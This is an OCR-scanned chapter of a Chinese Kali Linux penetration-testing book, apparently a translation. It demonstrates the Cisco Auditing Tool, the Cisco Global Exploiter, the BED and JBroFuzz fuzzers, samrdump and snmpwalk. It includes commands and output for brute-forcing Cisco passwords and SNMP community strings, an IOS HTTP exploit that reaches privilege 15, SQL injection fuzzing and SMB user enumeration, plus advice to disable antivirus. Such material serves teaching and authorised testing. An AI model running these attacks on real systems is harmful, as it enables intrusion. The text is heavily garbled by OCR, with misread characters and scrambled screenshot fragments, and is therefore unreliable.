- Report for scope: Workstation (Task: CustomerUK) 
Comments | Options Report | 


Host/Port/Severity ported by NVT "Microsoft's SQ | 


Global Settings 
v Q 192.168.0.7 


v Q ms-sql-s (1433/tcp) 


v CustomerUK he remote MS SQL server is vul 


Workstation 
n attacker may use this flaw to 
Report 20100830 ? Security Note he remote host as LOCAL/SYSTI 


b @ http (80/tcp) This alert might be a false pc 
b netbios-ns (137/udp) 

-= P jSolution : Install Microsoft Patch 
> Â general/tcp ]http://support.microsoft .com/def 
^ Â ftp (21cp) gen-us 

316333&sd-tech 
9 smtp (25/tcp) r disable the Microsoft SQL Sen 
8 ntp (123/udp) S SQL port (1433). 


? ms-wbt-server (3389) 


b 
b 
b 9 netbios-ssn (139/tcp) 
b 
b 
h 


? ms-sql-m (1434/udp) 
mirrac at de (Aachen SZ] 
UO CL — 13) 2) 
cI ja) Scan took place from Mon Aug 30 04:26:35 2010 to Mon Aug 30 04:29 


her references : IAVA:2002-B-( E 





图 7.3 
7.4 Cisco 分 析 工 具 


Cisco 公司 是 顶级 网 络 设备 丙 之 一 ， 目 前 大 多 公司 和 政府 机 构 都 采 
用 了 他 们 的 设备 。 对 于 Cisco 品 牌 的 设备 来 说， 它们 比 其 他 品牌 的 设备 
面临 着 更 多 的 着 攻击 和 威胁 ; 而 对 于 攻击 人 员 来 说 ， 发 掘 这 个 品牌 设备 
上 的 漏洞 也 比 挖掘 其 他 品牌 设备 的 漏洞 更 为 困难 。Cisco 品 牌 的 硬件 有 
路 由 器 、 交 换 机 、 安 全 设备 、 无 线 产 品 ， 软 件 产品 如 IOS、NX-OS、 安 
全 设备 管理 器 、CiscoWorks、 统 一 通信 管理 器 等 。 可 以 说 ， 在 广 受 好 评 
的 技术 产品 中 ， 有 不 少 是 Cisco — 品牌 的 产品 。 在 本 节 中 ， 我 们 将 演示 
Kali Linux 中 提供 的 针对 Cisco 产品 的 安全 测试 工具 。 

















7.4.1 Cisco Auditing Tool 





Cisco Auditing Tool 简称 CAT， 属 于 小 型 的 安全 审计 工具 。 它 可 检 
测 出 Cisco ”路 由 器 上 的 常见 漏洞 ， 能 够 发 现 注 入 默认 密码 、 默 认 SNMP 
字符 串 和 老 版 本 IOS 上 存在 的 bug 问 题 。 

如 需 局 动 CAT， 可 在 沫 单 里 依次 选中 Kali Linux | Vulnerability 
Analysis | Cisco Tools |cisco-auditing-tool。 启 动 终 端 窗口 之 后 ， 您 将 看 到 
扫 摘 目标 主机 可 用 的 所 有 选项 。 如 果 您 打算 继续 使 用 终端 窗口 ， 可 执行 





下 述 指令 。 
# cd /usr/share/ 
# CAT —help 


上 述 指令 将 显示 程序 的 全 部 选项 、 相 关 选 项 的 使 用 说 明和 功能 描 
。 它 扫 摘 Cisco 设 备 的 选项 有 以 下 几 个 。 

e-h: 指定 主机 名 《在 扫 摘 单个 主机 的 时 候 使 用 该 选项 ) 。 

e-w: 指定 字典 文件 〈 以 猜测 团体 字符 串 ) 。 

e -a: 指定 密码 列表 (以 穷 举 密码 ) 。 

e-i: 及 [ioshist] (检查 该 IOS 在 历史 上 出 现 过 的 bug) 。 

将 这 些 选 项 组 合 将 使 用 ， 可 以 骏 力 破解 方式 探测 Cisco 设 备 的 密 
人 码 、 团 体 字 符 串 和 可 能 会 再 现 的 旧 有 IOS bug。 在 人 破解 密码 之 前 ， 要 更 
新 路 径 /pentestcisco/cisco-auditingtooMlists 下 的 密码 列表 和 社区 字符 串 ， 
以 提高 破解 成 功 的 概率 。 而 后 ， 我 们 可 在 Kali Linux 的 终端 之 中 ， 使 用 
下 述 指令 进行 扫描 。 


# CAT -h ww.xx.yy.zz -w lists/community -a lists/passwords -i 


lx 


Cisco Auditing Tool - gOne [null0] 
Checking Host: ww.xx.yy.zz 
Guessing passwords: 

Invalid Password: diamond 
Invalid Password: cmaker 


Invalid Password: changeme 


Invalid Password: cisco 
Invalid Password: admin 
Invalid Password: default 
Invalid Password: Cisco 
Invalid Password: ciscos 
Invalid Password: cisco1 
Invalid Password: router 
Invalid Password: router1 
Invalid Password: Cisco 
Invalid Password: blender 


Password Found: pixadmin 


Guessing Community Names: 
Invalid Community Name: public 
Invalid Community Name: private 


Community Name Found: cisco 





如 需 编 辑 密码 字典 和 团体 字符 串 字 典 ， 可 在 执行 上 述 命令 之 前 ， 在 
Aim i O PEH Vim 编辑 器 编辑 字典 文件 。Vim 编 辑 器 的 详细 介绍 ， 可 
通过 下 述 指令 进行 查看 。 

# man vim 

Cisco 设 备 有 16 种 不 同 的 权限 级 别 ， 权 限 级 别 的 代码 从 0 限制 最 严 
格 的 级 别 ) 到 15《“ 限 制 最 少 的 级 别 ) 。 在 设置 Cisco 设 备 账户 的 时 候 ， 
每 个 账户 都 应 设置 相应 的 权限 等 级 。 如 需 更 详细 的 介绍 ， 请 参见 
http://www.cisco.com/en/US/docs/ios/12_2t/12_2t13/feature/guide/ftprienh.ht 


7.4.2 Cisco Global Exploiter 


Cisco Global Exploiter (CGE) 是 小 型 的 Perl 脚本 程序 。 它 可 测试 
Cisco 设备 的 14 种 独立 的 漏洞 。 请 注意 只 有 特定 类 型 的 Cisco 设 备 才 会 存 
在 这 些 漏 洞 ， 所 以 这 个 程序 不 能 完全 满足 Cisco 安 全 评估 的 全 部 需要 。 
篇 幅 所 限 ， 本 书 不 会 逐个 讲解 每 个 漏洞 的 具体 信息 。 

如 需 司 动 CGE， 可 在 沫 单 里 依次 选中 Kali Linux | Vulnerability 
Analysis | Cisco Tools |cisco-global-exploiter， 或 在 终端 窗口 中 执行 下 述 
JH» 





# cd /usr/bin/ 

# cge.pl 

上 述 指令 将 显示 程序 的 使 用 说 明 ， 并 会 按照 顺序 列 出 它 能 识别 的 14 
种 漏洞 。 例 如 ， 在 测试 Cisco 878 集成 服务 路 由 器 时 ， 我 们 可 以 使 用 下 
述 指令 。 

# cge.pl 10.200.213.25 3 

Vulnerability successful exploited with 
[http://10.200.213.25/level/17/exec/... ] ... 

上 述 指令 进行 的 是 第 3 类 测试 一 一 测试 Cisco IOS HTTPAuth 漏 洞 ， 
而 且 程 序 成 功 地 利用 了 某 个 漏洞 。 进 行 深 入 调查 之 后 ， 您 会 发 现 其 他 类 
型 的 Cisco 设 备 同 样 存 在 这 种 漏洞 ， 而 且 您 可 以 使 用 相似 的 手段 利用 这 
些 漏洞 。 利 用 漏洞 的 过 程 如 图 7.4 所 示 。 

















LaAntillana /level/15/exec/-/show/privilege/CR - Mo ™ @ 区 


File Edit View History Bookmarks Tools Help 
€ ə - 2 @ Bl. heno» | 加 "| 和 


Command [show privilege 


Out put 

Command base-URL was: /level/15/exec/- 

Complete URL was: /Level/15/exec/- /show/privilege/CR 
Command was: show privilege 


Current privilege level is 15 


command completed. 








图 7.4 
有 关 这 个 漏洞 的 详细 信息 ， 请 参见 
http://www.cisco.com/warp/public/707/cisco-sa-20010627-ios-http- 
level.shtml. 
可 见 ， 这 种 基于 HTTP AY SR AT V Tl vl n] LEA A AT E a 
令 ， 而 且 并 不 验证 他 们 的 身份 。 


7.5 Fuzz CERO 分 析 工 具 


模糊 分 析 是 一 种 软件 测试 技术 。 审 计 人 员 和 开发 人 员 采 用 模糊 分 析 
技术 ， 测 试 意外 数据 、 无 效 数 据 和 随机 的 数据 输入 对 应 用 程序 的 影 啊 。 
人 们 关注 应 用 程序 在 模糊 测试 中 出 现 的 异常 状态 和 崩 尝 问题 。 这 种 测试 
技术 可 深度 揭露 软件 所 隐 含 的 其 他 测试 手段 不 可 能 挖掘 出 来 的 漏洞 。 它 
能 发 现 的 漏洞 有 绥 冲 区 洲 出 、 格 式 化 字符 串 、 代 码 注 入 、 迷 途 指针 、 疯 
争 条 件 、 拒 绝 服务 条 件 和 许多 其 他 类 型 的 漏洞 。 

Kali Linux 带 有 多 种 模糊 测试 工具 。 这 些 工 具 可 以 测试 文件 格式 、 
网 络 协 议 、 命 令 行 输入 、 环 境 变量 和 Web 应 用 。 不 可 信 的 数据 输入 源 都 
会 输入 不 安全 的 和 不 一 致 的 数据 。 例 如 ， Web 应 用 程序 和 互联 网 用 户 
之 间 的 信任 边界 不 可 预知 。 既 然 如 此 ， 就 应 当 对 所 有 可 能 的 数据 输入 都 
进行 尝试 《模糊 测试 )， 以 验证 已 知 和 未 知 的 漏洞 。 模 糊 分 析 是 一 种 相 
对 人 简单 有 效 的 测试 方法 ， 可 用 于 质量 保证 和 安全 测试 。 由 于 这 个 原因 ， 
它 有 时 也 被 称 为 健壮 性 测试 (robustness testing) 或 否定 测试 (negative 
testing) 。 

模糊 分 析 的 关键 步骤 是 什么 ? 

通常 认为 ， 模 糊 测 试 由 6 个 步骤 组 成 。 这 些 步 又 分 别 是 识别 目标 、 
识别 输入 、 生 成 模糊 测试 数据 、 执 行 模糊 数据 、 监 控 输 出 和 鉴别 问题 的 
可 利用 性 (是 否 是 exploit) 。 有 关 细 节 ， 请 参见 Fuzzing: Brute Force 
Vulnerability Discovery 的 ppt 文 件 。 该 文件 可 在 下 述 网 址 下 载 : 
http://recon.cx/en/f/msutton-fuzzing.ppt. 











7.5.1 BED 


Bruteforce Exploit Detector (BED) 是 纯 文 本 协议 的 模糊 测试 工具 ， 
用 于 检测 软件 常见 漏洞 。 它 可 以 检测 出 缓冲 区 液 出 漏洞 、 格 式 化 字符 串 
漏洞 、 整 数 溢出 、DoS 条 件 等 漏洞 。BED 程序 可 以 根据 指定 的 协议 ， 自 
动 发 送 含 有 问题 字符 串 的 命令 组 合 ， 以 测试 目标 的 处 理 方式 。 它 目前 文 
持 的 协议 包括 ftp、smtp、pop、http、irc、imap、pjl、lpd、finger、 











socks4 和 socks5。 

如 需 启 动 BED 程序 ， 可 在 菜单 中 依次 选中 Kali Linux | Vulnerability 
Analysis | Fuzzing Tools | bed， 或 者 在 shell 中 使 用 下 述 指令 。 

# cd /usr/share/bed/ 

# bed.pl 

上 述 指令 将 显示 它 的 使 用 说 明 。 如 需 查 看 某 个 协议 的 插件 的 详细 说 
明 ， 可 使 用 下 述 指令 。 

# bed —s FTP 

该 指令 将 介绍 FIP 插件 的 参数 。 在 进行 测试 之 前 ， 我 们 通过 该 指 
令 了 解 到 这 个 插件 需要 -u 用 户 名 和 -v 密 码 这 两 个 参数 。 接 下 来 ， 我 们 利 
用 BED 测 试 目 标 系 统 的 FIP 守护 进 程 。 

# bed -s FTP -u ftpuser -v ftpuser -t 192.168.0.7 -p 21 -o 3 

BED 0.5 by mjm( www.codito.de ) & eric ( www.snake-basket.de) 








+ Buffer overflow testing: 

testing: 1 USER XAXAX . ......... 

testing: 2 USER ftpuserPASS XAXAX ........... 
* Formatstring testing: 

testing: 1 USER XAXAX  ...... 

testing: 2 USER ftpuserPASS XAXAX . ....... 

* Normal tests 

* Buffer overflow testing: 

testing: 1 ACCT XAXAX . . .......... 

testing: 2 APPE XAXAX .  ......... 

testing: 3. ALLO XAXAX . . . ......... 

testing: 4 CWD XAXAX  . ........ 

testing: b CEL XAXAX . . ......... 

testing: 6 DELE XAXAX . . ........... 


testing: 7 HELP XAXAX . . .......... 

testing:8 MDTM XAXAX .  .......... 

testing: 9 MLST XAXAX .  ........ 

testing: 10 MODE XAXAX  . ......... 

testing: 11 MKD XAXAX  . ......... 

testing: 12 MKD XAXAXCWD XAXAX  .......... 

testing: 13 MKD XAXAXDELE XAXAX ........... 

testing: 14 MKD XAXAXRMD XAXAX . ..... connection 

attempt failed: No route to host 
上 述 信 息 表 明 ，FTP 守 护 程序 在 第 14 项 测试 的 时 候 中 断 了 连接 。 这 

可 能 是 个 潜在 的 缓冲 区 溢出 问题 。 但 是 我 们 还 需要 调查 特定 测试 模块 ， 
检查 测试 指令 (参考 文件 /pentest/fuzzers/bed/bedmod/ftp.pm〉 ， 以 进行 
进一步 调查 。 将 目标 程序 恢复 到 正常 状态 再 进行 两 次 重复 试验 、 增 加 
BED 的 超时 时 间 (-0) ， 都 是 确认 问题 可 重复 出 现 的 恨 好 习惯。 


7.5.2 JBroFuzz 


JBroFuzz 是 对 Web 应 用 程序 进行 模糊 测试 的 著名 平台 。 它 可 模拟 
HTTP 协 议和 HTTPS 协 议 的 Web 请 求 。 获 悉 要 测试 的 域名 和 测试 的 URL 
部 分 之 后 ， 审 计 人 员 可 以 自己 手工 构造 测试 的 请 求 ， 也 可 以 使 用 程序 预 
定义 的 payload 数 据 库 ， 生 成 基于 已 知 漏洞 的 恶意 请 求 ， 再 把 这 些 请 求 发 
送 到 目标 服务 器 以 进行 模糊 测试 。JbroFuzz 的 数据 库 能 够 帮助 审计 人 员 
进行 XSS、SQL 注入 、 绥 冲 区 洲 出 、 格 式 字 符 串 错误 等 问题 的 自动 化 济 
试 。 而 后 ， 程 序 会 记录 目标 的 相应 回复 ， 以 供 进 一 步 检查 。 基 于 执行 测 
试 的 类 型 ， 审 计 人 员 应 当 手 动 调 得 服 务 器 的 响应 或 结果 ， 以 便 识 别 出 任 
何 可 能 存在 的 漏洞 。 

JBroFuzz 的 关键 功能 包括 模糊 管理 、payload 的 分 类 处 理 、 通 过 浏览 
器 的 代理 服务 器 噢 探 Web 请 求 和 回复 、 枚 举 网 站 目录 等 。 这 些 功 能 都 


























是 应 用 协议 模糊 测试 不 可 或 缺 的 组 成 部 分 。 

如 需 局 动 JBroFuzz 程 序 ， 可 在 终端 中 使 用 下 述 指令 。 

# cd /usr/share/zaproxy/lib/jbrofuzz/ 

# java -jar JBroFuzz.jar 

JBroFuzz 界面 之 中 有 大 量 的 选项 设置 ， 这 些 选 项 都 有 详细 的 描述 和 
说 明 。 如 果 您 需要 得 看 帮助 ， 可 在 沫 单 栏 中 选择 Help | Topics， 进 入 图 
7.5 所 示 的 界面 。 

接 下 来 ， 我 们 通过 下 述 步 又 测试 一 个 Web 应 用 程序 。 

1.， 设 定 日 标 域 的 URL 为 http://testasp.targetdomain.com。 这 是 一 个 基 
于 ASP 的 Web 应 用 程序 。 为 满足 测试 需求 的 实际 需要 ， 我 们 还 要 在 
Request 面 板 中 将 HTTP 请 求 调整 为 如 下 所 示 。 


JBroFuzz - Untitled 2E INE: 
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图 7.5 
GET /showthread.asp?id=4 HTTP/1.0 
Host: testasp.example.com 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; 
rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10 
Accept: text/html, application/xhtml+xml,application/ 
xml;q=0.9,*/*;q=0.8 
Accept-Language: en-gb,en;q=0.5 
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 





2. 在 构造 测试 请 求 数据 之 前 ， 我 们 已 经 知道 这 合 服务 器 上 存在 一 个 
URL: http://testasp.example.com/showthread.asp?id-4. 

3. 创建 一 个 手工 构造 的 测试 请 求 ， 并 选择 URL 的 一 部 分 (id=4) XE 
行 SQL 注 入 的 测试 。 

4. 选中 第 一 行 里 的 数字 值 4， 然 后 点 击 项 部 菜单 条 里 的 加 写 C+) 按 
‘Hl. 

5. 在 新 弹出 的 窗口 里 ， 选 择 SQL Injection 分 类 ， 并 设置 模糊 测试 的 
名 称 为 SQL Injection， 然 后 点 击 Add Fuzzer 按 钮 。 

6. 设置 好 模糊 测试 任务 之 后 ， 主 程序 窗口 的 右 侧 边 角 的 Added 
Payloads Table 标 签 里 ， 将 会 显示 这 个 测试 任务 。 

如 果 您 的 操作 完全 遵循 上 述 步 台 ， 那 么 您 现在 就 可 以 对 目标 主机 的 
Web 应 用 程序 进行 SQL 注入 漏洞 的 模糊 测试 。 

HY WISE f Panel | Start 或 快捷 键 Ctrl+Enter 局 动 测试 任务 。 在 程序 
处 理 测 试 请 求 的 时 候 ， 您 将 在 Request 面 板 里 看 到 程序 发 送 的 请 求 。 另 
外 ， 如 果 要 观察 每 个 HTTP/HTTPS 的 处 理 进 度 ， 可 点 击 On The Wire fs 
签 查看 。 在 它 完成 模糊 测试 之 后 ， 可 调查 每 个 测试 请 求 的 啊 应 结果 。 可 
在 Output ”窗口 中 使 用 鼠标 右键 点 击 特定 的 服务 器 啊 应 ， 然 后 选择 Open 
in ”Browser 选 项。 目标 对 我 们 发 送 的 测试 请 求 返回 了 下 述 信息 ， 它 很 可 
能 是 SQL 注入 漏洞 的 现象 。 

HTTP/1.1 500 Internal Server Error Connection:close Date: Sat, 04 

Sep 2013 21:59:06 GMT Server: Microsoft-IIS/6.0 X-Powered-By: 

ASP.NET Content-Length: 302 Content-Type: text/html Set-Cookie: 

ASPS ESSIONIDQADTCRCB=KBLKHENAJBNNKIOKKAJJFCDI; 
path=/ Cache-control: private 
Microsoft SQL Native Client error '80040e14' 


Unclosed quotation mark after the character string ". 




















/showthread.asp, line 9 


在 Windows 系 统 中 安装 Metasploit 时 ， 应 该 禁用 防 病毒 软件 ， 因 为 有 
些 安装 文件 会 被 其 检测 为 潜在 的 病毒 或 威胁 ， 从 而 阻 赛 安装 过 程 。 有 关 
这 个 程序 的 详细 信息 ， 请 参见 


http://wiki191.owasp.org/index.php/Category:OWASP_JbroFuzz. 


7.6 SMB 分 析 工 具 





Server Message Block (SMB) 是 应 用 层 协议 ， 通 常用 于 文件 和 打印 
机 共享 服务 。 此 外 ， 它 还 可 将 网 络 中 不 同 节 点 的 串口 服务 和 其 他 通信 协 
议 共 享 。SMB 又 称 为 CIFS (Common Internet File System) 。 

SMB 采 用 了 单纯 的 客户 端 /服务 器 的 CS 架构 ， 而 且 兼 容 Linux 和 
Windows 等 多 种 平台 。NetBIOS (Network BasicInput Output System) 是 
SMB 协议 的 组 成 部 分 ， 用 于 Windows 系 统 的 传输 服务 。NetBIOS 工作 于 
TCP/IP 协议 (NBT) ， 因 此 同一 局 域 网 内 的 每 台电 脑 都 可 通过 唯一 的 
网 络 名 称 和 了 地址 与 另 一 侣 电脑 进行 通信 。 

此 外 ， 对 于 DEC/RPC 服 务 程序 实现 的 网 络 节点 间 IPC《 路 进程 通 
信 ) 而 言 ， 其 认证 通道 同样 使 用 SMB 协 议 。 也 就 是 说 ， 不 同 电脑 、 不 同 
进程 间 都 可 通过 SMB 的 认证 通道 进行 数据 交换 。NetBIOS 服 务 通常 在 不 
同 的 TCP 端 口 和 UDP 端口 〈135、137、138、139、445) 上 提供 不 同 的 
服务 。 因 为 SMB 功 能 强大 而 防护 能 力 脆弱 ， 所 以 它 是 黑客 的 首要 攻击 目 
标 。 人 们 曾经 曝光 了 SMB 协 议 的 大 量 漏洞 ， 这 些 漏洞 都 为 入 侵 者 敞开 了 
方便 之 门 。 本 市 将 介绍 获取 SMB 信 息 的 多 个 工具 ， 它 们 可 获取 主机 名 、 
运行 服务 、 域 控制 器 、MAC 地 址 、 操 作 系 统 类 型 、 当 前 登录 用 户 、 隐 
藏 共享 、 时 间 信 息 、 用 户 群 组 、 当 前 会 话 、 打 印 机 、 可 用 磁盘 等 信息 。 

如 需 了 解 SMB、NetBIOS 和 相关 协议 的 详细 信息 ， 请 参见 
http://timothydevans.me.uk/nbf2cifs/book1.html. 











ImpacketSamrdump 





Samrdump 是 获取 主机 敏感 信息 的 工具 。 它 通过 
DCE/RPC (Distributed Computing Environment/Remote Procedure Call) 
服务 调用 SAM〔 安 全 账户 管理 器 ，Security Account Manager) 的 远程 接 
口 ， 继 而 获取 信息 。 它 可 列举 同一 局 域 网 内 的 目标 主机 上 的 所 有 的 系统 
共享 、 用 户 账 户 和 其 他 信息 。 

如 需 启 动 ImpacketSamrdump， 可 在 shell 中 执行 下 述 指 令 。 


# cd /usr/share/doc/python-impacket-doc/examples/samrdump.py 





# python samrdump.py 
上 述 指 令 将 显示 它 的 使 用 说 明和 必要 的 语法 简介 。 简 单 的 说 ， 
python samrdump.py user:pass@ip port/SMB 这 样 的 指令 就 可 对 指定 目标 
的 指定 端口 (139 或 445) 进行 检测 。 
# python samrdump.py h4x:123@192.168.0.7 445/SMB 
Retrieving endpoint list from 192.168.0.7 
Trying protocol 445/SMB... 
Found domain(s): 
. CUSTDESK 
. Builtin 
Looking up users in domain CUSTDESK 
Found user: Administrator, uid = 500 
Found user: ASPNET, uid = 1005 
Found user: Guest, uid = 501 
Found user: h4x, uid = 1010 
Found user: HelpAssistant, uid = 1000 
Found user: [USR_MODESK, uid = 1004 
Found user: IWAM MODESK, uid = 1009 
Found user: MoDesktop, uid = 1003 
Found user: SUPPORT. 38894540, uid = 1002 


Administrator (500)/Enabled: true 





上 述 指 令 列 出 了 远程 主机 上 的 全 部 用 户 名 。 在 Samrdump 的 指令 之 
中 ,目标 主机 的 用 户 名 和 密码 并 不 是 必 选 项 ， 在 指定 用 户 名 和 密码 时 ， 
该 指令 将 能 返回 其 他 方式 获取 不 到 的 更 多 信息 。 利 用 上 述 信息 ， 我 们 可 
检查 在 共享 文件 中 搜索 敏感 数据 ， 访 问 其 他 用 户 ， 进 而 揭示 更 有 价值 的 
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7.7 SNMP^] LE 


SNMP (Simple Network Management Protocol) 是 一 个 运行 于 UDP 
协议 161 端口 的 应 用 层 协议 。SNMP 协议 主要 用 于 网 络 设备 运行 状态 的 
监控 ， 以 关注 需要 管理 员 干 预 的 事件 ， 及 时 了 解 诸如 电源 断 电 、 网 络 不 
可 达 等 网 络 运 行情 况 。 采 用 了 SNMP 管 理 技术 的 网 络 结构 ， 通 常 由 网 络 
设备 、 管 理 端 和 代理 端 组 成 。 

管理 端 程序 负责 网 络 管理 和 状态 监控 的 管理 任务 。 代 理 端 是 网 络 设 
备 运行 的 软件 。 可 运行 客户 端 程序 的 网 络 设备 包括 文 持 SNMP 协 议 路 由 
器 、 交 换 机 、 集 线 器 、 网 络 摄像 头 、 网 桥 ， 以 及 安装 客户 端 程序 的 操作 
系统 (Linux, Windows) 主机 。 安 装 了 代理 端 程序 的 设备 通过 SNMP 协 
议 回 管理 端 报告 设备 珊 宽 、 正 常 运行 时 间 、 运 行进 程 、 网 络 接口 、 系 统 
服务 等 数据 信息 。SNMP 信息 通过 多 个 变量 分 别 描述 了 系统 不 同方 面 的 
配置 情况 。SNMP 信息 采用 MIB (Management Information Base) 的 层 
次 结构 方式 组 织 消 恩 中 的 各 种 变量 ， 每 个 变量 有 确定 的 唯一 对 象 标识 符 

(Object Identifier, OID) . SNMP 协议 共有 三 个 版 本 ， 即 v1、v2 和 
V3。 

以 安全 角度 看 ，VvL 和 v2 版 本 的 方案 均 是 通过 团体 字符 串 实现 安全 防 

护 。 而 v3 在 保密 性 、 完 整 性 和 号 份 验证 方面 的 功能 更 好 。 本 文 介 绍 的 工 




















具 主 要 针对 基于 vIL 和 v2c 的 SNMP 设 备 。 


如 需 深入 了 解 SNMP 协 议 ， 请 参见 http://www. tech- 
faq.com/snmp.html。 
SNMP Walk 





SNMP Walk 是 一 个 功能 强大 的 SNMP 信 息 采 集 工 具 。 它 可 依据 设备 
类 型 提取 所 有 配置 数据 。 这 些 信息 将 对 攻击 的 后 续 工作 非常 有 用 。 此 
外 ，SNMP Walk 可 针对 性 地 获取 单 组 MIB 数 据 或 特定 OID 值 。 

如 需 局 动 SNMP Walk 程序 ， 可 在 终端 中 使 用 下 述 指令 。 

# snmpwalk 

上 述 命 令 将 显示 该 程序 的 使 用 说 明和 选项 说 明 。SNMP Walk 可 以 
使 用 三 种 不 同 版 本 的 SNMP 协 议 〈“ 即 WI、v2c 和 v3)〉 ， 这 也 是 它 的 主要 优 
势 所 在 。 在 远程 设备 使 用 的 SNMP 协 议 不 能 向 下 兼容 时 ， 这 一 优势 将 及 
挥 作用 。 本 例 将 使 用 下 述 指令 ， 在 指令 行 中 分 别 以 v1 和 v2c 版 本 的 SNMP 
协议 获取 远程 主机 的 信息 。 

# snmpwalk -v 2c -c public -O T -L f snmpwalk.txt 10.20.127.49 

SNMPv2-MIB::sysDescr.0 = STRING: Hardware: x86 Family 15 
Model 4 

Stepping 1 AT/AT COMPATIBLE - Software: Windows Version 5.2 
(Build 3790 Multiprocessor Free) 








SNMPv2-MIB::sysObjectID.0 = OID: SNMPv2- 
SMI::enterprises.311.1.1.3.1.2 
DISMAN-EVENT-MIB::sysUpTimelnstance = Timeticks: 


(1471010940) 170 days, 6:08:29.40 
SNMPv2-MIB::sysContact.0 = STRING: 
SNMPv2-MIB::sysName.0 = STRING: CVMBC-UNITY 
SNMPv2-MIB::sysLocation.0 = STRING: 
SNMPv2-MIB::sysServices.0 = INTEGER: 76 


IF-MIB: 
IF-MIB: 
IF-MIB: 
IF-MIB: 
IF-MIB: 
IF-MIB: 


network 


dial in clients 
IF-MIB: 


#2 


IF-MIB: 


IF-MIB: 
IF-MIB: 
IF-MIB: 
IF-MIB: 
IF-MIB: 
IF-MIB: 
IF-MIB: 
IF-MIB: 


IF-MIB: 
IF-MIB: 
IF-MIB: 


IP-MIB: 
IP-MIB: 
IP-MIB: 


:让 Number.0 = INTEGER: 4 

:ifIndex.1 = INTEGER: 1 

:ifIndex.65538 = INTEGER: 65538 

:ifIndex.65539 = INTEGER: 65539 

:ifIndex.65540 = INTEGER: 65540 

:让 Descr.1 = STRING: Internal loopback interface for 127.0.0 


ifDescr.65538 = STRING: Internal RAS Server interface for 


:ifDescr.65539 = STRING: HP NC7782 Gigabit Server Adapter 


:ifDescr.65540 = STRING: HP NC7782 Gigabit Server Adapter 
:ifType.1 = INTEGER: softwareLoopback(24) 

:ifType.65538 = INTEGER: ppp(23) 

:ifType.65539 = INTEGER: ethernetCsmacd(6) 

:ifType.65540 = INTEGER: ethernetCsmacd(6) 

:itMtu.1 = INTEGER: 32768 

:ifMtu.65538 = INTEGER: 0 

:ifMtu.65539 = INTEGER: 1500 


:ifPhysAddress.65539 = STRING: 0:13:21:c8:69:b2 
:ifPhysAddress.65540 = STRING: 0:13:21:c8:69:b3 
ifAdminStatus.1 = INTEGER: up(1) 


pAdEntAddr.127.0.0.1 = IpAddress: 127.0.0.1 
pAdEntAddr.192.168.1.3 = IpAddress: 192.168.1.3 
:ipAdEntAddr.192.168.1.100 = IpAddress: 192.168.1.100 


IP-MIB: 
IP-MIB: 
IP-MIB: 
IP-MIB: 
IP-MIB: 
IP-MIB: 
IP-MIB: 
IP-MIB: 
IP-MIB: 
IP-MIB: 
IP-MIB: 
IP-MIB: 
IP-MIB: 
IP-MIB: 
IP-MIB: 
IP-MIB: 


IP-MIB 


3pAdEntAddr.10.20.127.52 = IpAddress: 10.20.127.52 
:ipAdEntIfIndex.127.0.0.1 = INTEGER: 1 
:ipAdEntIfIndex.192.168.1.3 = INTEGER: 65540 
ipAdEntIfIndex.192.168.1.100 = INTEGER: 65538 
:ipAdEntIfIndex.10.20.127.52 = INTEGER: 65539 
pAdEntNetMask.127.0.0.1 = IpAddress: 255.0.0.0 
pAdEntNetMask.192.168.1.3 = IpAddress: 255.255.255.0 
:ipAdEntNetMask.192.168.1.100 = IpAddress: 255.255.255.255 
:ipAdEntNetMask.10.20.127.52 = IpAddress: 255.255.255.248 
:ipAdEntBcastAddr.127.0.0.1 = INTEGER: 1 
:ipAdEntBcastAddr.192.168.1.3 = INTEGER: 1 
:ipAdEntBcastAddr.192.168.1.100 = INTEGER: 1 
:ipAdEntBcastAddr.10.20.127.52 = INTEGER: 1 
:ipAdEntReasmMaxSize.127.0.0.1 = INTEGER: 65535 
:ipAdEntReasmMaxSize.192.168.1.3 = INTEGER: 65535 
ipAdEntReasmMaxsSize.192.168.1.100 = INTEGER: 65535 
ipAdEntReasmMaxsSize.10.20.127.52 = INTEGER: 65535 


RFC1213-MIB::ipRouteDest.0.0.0.0 = IpAddress: 0.0.0.0 
RFC1213-MIB::ipRouteDest.127.0.0.0 = IpAddress: 127.0.0.0 
RFC1213-MIB::ipRouteDest.127.0.0.1 = IpAddress: 127.0.0.1 
RFC1213-MIB::ipRouteDest.192.168.1.0 = IpAddress: 192.168.1.0 
RFC1213-MIB::ipRouteDest.192.168.1.3 = IpAddress: 192.168.1.3 
RFC1213-MIB::ipRouteDest.192.168.1.100 = IpAddress: 192.168.1.100 
RFC1213-MIB::ipRouteDest.192.168.1.255 = IpAddress: 192.168.1.255 
RFC1213-MIB::ipRouteDest.10.20.127.48 = IpAddress: 10.20.127.48 
RFC1213-MIB::ipRouteDest.10.20.127.52 = IpAddress: 10.20.127.52 
RFC1213-MIB::ipRouteDest.10.20.127.255 = IpAddress: 10.20.127.255 





上 述 指令 的 输出 信息 可 帮助 我 们 深入 地 了 解 目 标 主 机 。 其 中 ， 选 
项 -c 用 于 指定 提取 MIB 所 需 的 团体 字符 串 ，-O 选项 将 输出 结果 以 可 读 
的 文本 〈T) 形式 进行 输出 ，- 工 选项 将 数据 保存 为 文件 (f 
snmpwalk.txt) 。 如 需 详 细 了 解 SNMP Walk 各 种 使 用 方法 ， 可 访问 网 址 
http://net-snmp.sourceforge.net/wiki/index.php/TUT:snmpwalk. 7235 Jy 
人 员 获 取 的 信息 量 越 多 ， 他 们 对 目标 网 络 架构 理解 得 越 透 彻 。 


7.8 Web 程 序 分 析 工 具 





现在 的 应 用 程序 大 多 采用 了 多 种 Web 技 术 ， 这 不 仅 增加 了 程序 问题 
的 复杂 性 ， 而 且 增 加 了 敏感 数据 泄露 的 风险 。 一 直 以 来 ，Web 应 用 程序 
从 始 至 终 都 是 恶意 对 手 窃取 、 操 纵 、 破 坏 和 敲诈 企业 业务 的 目标 。Web 
应 用 程序 的 大 量 普及 ， 也 给 渗透 测试 人 员 带 来 了 前 所 未 有 的 巨大 挑 成 。 
Web MHES iim) PAGE aim ABeE A E E hE A o 
Web 应 用 程序 扮演 着 数据 处 理 系 统 的 角色 ， 而 数据 库 负 责 存储 敏感 数据 
《例如 信用 卡号 、 用 户 信息 、 认 证 数据 等 ) ， 所 以 两 者 的 安全 性 都 要 兼 
DE 

本 节 把 Web 应 用 程序 的 安全 分 析 分 为 “web 应 用 程序 测试 ?和 “数据 库 
